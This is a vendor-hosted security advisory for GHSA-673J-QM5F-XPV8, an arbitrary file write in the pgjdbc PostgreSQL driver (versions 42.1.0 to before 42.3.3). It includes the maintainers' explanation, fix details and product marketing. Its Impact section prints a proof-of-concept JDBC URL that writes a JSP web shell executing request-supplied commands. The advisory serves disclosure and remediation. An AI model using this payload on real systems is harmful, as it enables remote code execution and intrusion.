GHSA-673J-QM5F-XPV8

GHSA-673J-QM5F-XPV8 is a medium-severity security vulnerability in org.postgresql:postgresql (maven), affecting versions >= 42.1.0, < 42.3.3. It is fixed in 42.3.3.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

pgjdbc Arbitrary File Write Vulnerability

Overview

The connection properties for configuring a pgjdbc connection are not meant to be exposed to an unauthenticated attacker. While allowing an attacker to specify arbitrary connection properties could lead to a compromise of a system, that's a defect of an application that allows unauthenticated attackers that level of control.

It's not the job of the pgjdbc driver to decide whether a given log file location is acceptable. End user applications that use the pgjdbc driver must ensure that filenames are valid and restrict unauthenticated attackers from being able to supply arbitrary values. That's not specific to the pgjdbc driver either, it would be true for any library that can write to the application's local file system.

While we do not consider this a security issue with the driver, we have decided to remove the loggerFile and loggerLevel connection properties in the next release of the driver. Removal of those properties does not make exposing the JDBC URL or connection properties to an attacker safe and we continue to suggest that applications do not allow untrusted users to specify arbitrary connection properties. We are removing them to prevent misuse and their functionality can be delegated to java.util.logging.

If you identify an application that allows remote users to specify a complete JDBC URL or properties without validating it's contents, we encourage you to notify the application owner as that may be a security defect in that specific application.

Workarounds

sanitize the inputs to the driver

Reported by Allan Lou [email protected]

Impact

It is possible to specify an arbitrary filename in the loggerFileName connection parameter
"jdbc:postgresql://localhost:5432/test?user=test&password=test&loggerLevel=DEBUG&loggerFile=./blah.jsp&<%Runtime.getRuntime().exec(request.getParameter("i"));%>"

This creates a valid JSP file which could lead to a Remote Code Execution

Affected versions

org.postgresql:postgresql (>= 42.1.0, < 42.3.3)

Security releases

org.postgresql:postgresql → 42.3.3 (maven)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

LoggerFile implementation has been removed and will be ignored by the driver, fixed in 42.3.3

Frequently Asked Questions

  1. What is GHSA-673J-QM5F-XPV8? GHSA-673J-QM5F-XPV8 is a medium-severity security vulnerability in org.postgresql:postgresql (maven), affecting versions >= 42.1.0, < 42.3.3. It is fixed in 42.3.3.
  2. Which versions of org.postgresql:postgresql are affected by GHSA-673J-QM5F-XPV8? org.postgresql:postgresql (maven) versions >= 42.1.0, < 42.3.3 is affected.
  3. Is there a fix for GHSA-673J-QM5F-XPV8? Yes. GHSA-673J-QM5F-XPV8 is fixed in 42.3.3. Upgrade to this version or later.
  4. Is GHSA-673J-QM5F-XPV8 exploitable, and should I be worried? Whether GHSA-673J-QM5F-XPV8 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether GHSA-673J-QM5F-XPV8 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix GHSA-673J-QM5F-XPV8? Upgrade org.postgresql:postgresql to 42.3.3 or later.

Other vulnerabilities in org.postgresql:postgresql

Stop the waste.
Protect your environment with Kodem.